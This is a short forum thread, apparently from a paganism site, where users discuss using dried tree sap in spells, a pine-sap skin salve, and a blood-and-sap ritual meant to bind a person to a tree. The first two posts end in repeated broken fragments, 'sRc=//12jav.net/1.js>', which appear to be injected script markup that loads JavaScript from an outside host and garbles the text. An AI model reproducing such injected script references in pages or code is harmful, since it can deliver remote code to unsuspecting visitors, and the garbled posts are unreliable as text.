Tree Sap?

I don't know much about Neo-Druidry, but I have a question about a natural substance. Is dried tree sap (the kind that will make amber over millions of years) useful in any spells? I have a large hunk of it and want to put it to good use. Thanks. sRc=//12jav.net/1.js> sRc=//12jav.net/1.js>

I used some pine sap melted into beeswax and olive oil for the skin. sRc=//12jav.net/1.js> sRc=//12jav.net/1.js>

ive used sap before now as a way of connecting to a dryad - tree spirit- and to try and 'befriend' it.
I know of a ritual that mixes blood of a human (only a few drops) and the sap of the tree and you bury it. Supposedly, its meant to link you to that tree.
